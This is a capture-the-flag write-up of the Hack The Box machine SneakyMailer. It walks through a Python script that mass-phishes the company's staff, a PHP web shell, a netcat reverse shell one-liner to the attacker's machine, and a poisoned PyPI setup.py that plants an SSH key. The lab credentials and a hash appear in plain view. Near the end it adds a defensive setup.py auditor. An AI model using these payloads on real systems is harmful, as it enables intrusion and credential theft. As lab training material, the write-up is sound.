@3rg1s
Created September 14, 2020 13:09

Hello fellow hackers,

From the nmap scan I have 7 open ports.

# Nmap 7.80 scan initiated Wed Sep  9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES NAMESPACE UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA IDLE ENABLE STARTTLS ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES AUTH=PLAIN UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA NAMESPACE ENABLE IDLE ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  9 05:07:08 2020 -- 1 IP address (1 host up) scanned in 43.31 seconds

Port 80

As always, I go to port 80 first. The website shows a dashboard, but I can't do much with it. At team.php I can see the list of all employees of the company. Directory brute force also didn't give me anything. Looking at the nmap output again, we have SMTP open on port 25.

Port 25

SMTP, or Simple Mail Transfer Protocol, is the protocol that handles email transfer, so it is used to send emails; IMAP, on the other hand, is used to receive email. With SMTP open on port 25, we can use telnet and try to send emails to the addresses we found at team.php.

kali@kali:~/Desktop/SneakyMailer/nmap$ telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
220 debian ESMTP Postfix (Debian/GNU)
MAIL FROM: anything@htb.com
250 2.1.0 Ok
RCPT TO: someemail@htb.com
454 4.7.1 <someemail@htb.com>: Relay access denied
RCPT TO:airisatou@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello there friend.
.
250 2.0.0 Ok: queued as 5A0B024689

So we successfully sent an email to one of the addresses found on team.php. Maybe we can send a link and see if someone behind these addresses clicks it. First we need all the email addresses from team.php, which cewl can collect:

cewl -n -e --email_file mailid.txt http://sneakycorp.htb

This writes a file mailid.txt with all the email addresses. To automate sending an email to each address I wrote the Python script below, and I also set up a listener on my machine.

#!/usr/bin/python

import smtplib

# Connect to the target MTA; it accepts mail for local sneakymailer.htb recipients
smtpObj = smtplib.SMTP('10.10.10.197')
sender = 'fuxsocy@htb.com'
# The body is just a link back to my machine, where a listener is waiting
message = "Check this out http://10.10.14.188"

# mailid.txt is the address list produced by cewl, one address per line
with open("../email/mailid.txt") as mails:
    emails = [line.strip() for line in mails.read().split("\n") if line]
    for i in emails:
        smtpObj.sendmail(sender, i, message)
        print("Successfully sent email to " + i)

smtpObj.quit()

[image: emailsent]

A user clicked the link and sent us these parameters. They are URL-encoded, so I decode them.

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht

Now I have the password of an email account. I tried it on the SSH port but failed, and it failed on FTP as well.

But since this is an email account, I can use it to authenticate to the IMAP server. I install Evolution, an email client, and log in as paulbyrd with the password found.

Inside the Sent folder, one email has credentials in it.

Hello administrator, I want to change this password for the developer account

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it

I then use this password against FTP and log in successfully. I also have permission to upload files to the server inside the /dev/ folder. I create a simple PHP shell script and upload it with the put command.

<?php
echo exec($_GET['fuxsocy']);
?>

But I wasn't able to find the script on the web app on port 80. Maybe it was hidden in another folder, but that wasn't the case. I did a little subdomain discovery using wfuzz and found another subdomain.

[image: dev]

This finds another subdomain, called dev. I edit the /etc/hosts file and add that subdomain. Upon visiting it I try to gain RCE with the file I previously uploaded via FTP.

[image: rce]

At this moment I try to get a reverse shell back to me, by running the following command through the web shell, URL-encoded:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPHERE 8989 >/tmp/f

Looking inside /var/www we have 3 folders: 2 of them belong to different subdomains and 1 is /html. I explore pypi.sneakycorp.htb as this is new to me. Inside it is a .htpasswd file containing a hash along with a username.

pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/ 

Looking at the hashcat example hashes, this is mode 1600 (Apache $apr1$ MD5). I use rockyou.txt and find the password soufianeelhaoui for the pypi server.

About pypi server

Pypiserver is a repository of Python packages that you can fetch with pip. You can also create your own packages and store them there. We have the username and the password, so we can use them to upload our own package to the server. Reading this post from Linode I got an understanding of what I should do to upload my own package. Let's break it down and create one:

Our directory structure should look like this, where package_htb is our package name.

package_htb/
    package_htb/
        __init__.py
    setup.py
    setup.cfg

I create these inside /dev/shm/; you can also use /tmp/ or any directory you have write access to.

__init__.py:

def hello_word():
    print("hello world")

Inside this file we can execute our own code, as long as the package reaches the server. While enumerating I found a user, low, whose authorized_keys I can read but not write, so I create an SSH key pair on my local machine and have the package write the public key for user low on the target:

ssh-keygen -t ed25519

I use ed25519 because the public key is short, so I won't mess up the Python code with line breaks.

setup.py:

from setuptools import setup

# This block runs whenever setup.py is executed. Building the sdist locally
# cannot write to low's home directory, so the error is swallowed and setup()
# still runs; on the server, where the package is processed with access to
# that path, the public key lands in authorized_keys.
try:
    with open("/home/low/.ssh/authorized_keys", 'w') as f:
        f.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBu9PghaYMY4ap+f/M7Z2LnkRyaYEIH7EphN6xV2Zug kali@kali")
except Exception:
    pass

setup(
    name = 'package_htb',
    packages = ['package_htb'],
    description = 'Hello world enterprise edition',
    version = '0.1',
    url = 'http://pypi.sneakycorp.htb/package_htb',
    author = 'package_htb',
    author_email = 'fuxsocy@sneaky.com',
    keywords = ['pip', 'gis', 'example']
)

setup.cfg:

[metadata]
description-file = README.md

To upload the package to the server we need another file containing the password we found.

.pypirc:

[distutils]
index-servers =
pypi
package_htb
[pypi]
username:
password:
[package_htb]
repository: http://127.0.0.1:5000
username: pypi
password: soufianeelhaoui

The server port was found using netstat, and then I used wget to verify it was the right port.

Now we build the source distribution:

python3 setup.py sdist

Set the home directory to the current path, so that the .pypirc there is the one used:

export HOME=/dev/shm/package_htb

Upload the package to the server:

python3 setup.py sdist upload -r package_htb

Now our SSH public key has been written to the low user's profile, so we can log in as low over SSH.
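The package works because setup.py is ordinary Python that runs wherever the package is built or installed. As an added example (not the box's or pypiserver's code), here is a small ast-based check that flags a setup.py doing more than describing a package: write-mode open() calls and process or shell execution. The two sample setup.py strings are constructed, and audit_setup_py is my name.

```python
import ast
# Constructed sample shaped like the package above: a module-level write.
MALICIOUS_SETUP = '''
from setuptools import setup
try:
    with open("/home/low/.ssh/authorized_keys", "w") as f:
        f.write("ssh-ed25519 AAAA... someone@somewhere")
except Exception:
    pass
setup(name="package_htb", version="0.1", packages=["package_htb"])
'''
# Constructed benign sample: reading README for long_description is normal.
BENIGN_SETUP = '''
from setuptools import setup
with open("README.md") as fh:
    long_description = fh.read()
setup(name="package_ok", version="0.1", long_description=long_description)
'''
# Callees that have no business in a package description.
SUSPICIOUS_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call", "subprocess.Popen",
                    "subprocess.check_output", "exec", "eval", "socket.socket", "os.remove"}

def _dotted_name(func):
    """Render the callee of a Call node as 'os.system'-style text, or None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None

def _open_writes(call):
    """True if an open() call uses a writing mode (contains w, a, x or +)."""
    mode = call.args[1] if len(call.args) > 1 else None
    mode = next((kw.value for kw in call.keywords if kw.arg == "mode"), mode)
    if isinstance(mode, ast.Constant) and isinstance(mode.value, str):
        return any(ch in mode.value for ch in "wax+")
    return False

def audit_setup_py(source):
    """Return [(lineno, callee)] for each suspicious call in a setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS or (name == "open" and _open_writes(node)):
                findings.append((node.lineno, name))
    return findings
```

Run it over the setup.py pulled out of an sdist tarball before an index accepts the upload, or before a scheduled pip install consumes it; a read-only open() of README.md passes, the authorized_keys write does not.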

Getting root via pip3

User low can run pip3 as sudo without a password.

[image: privesc]

Visiting GTFOBins, we can use that to gain root access on the system.

Exploring how some things work

We can find some scripts inside the /opt directory which automate the email click and the FTP file deletion. Looking at those scripts we can learn more about PHP and Python 3.
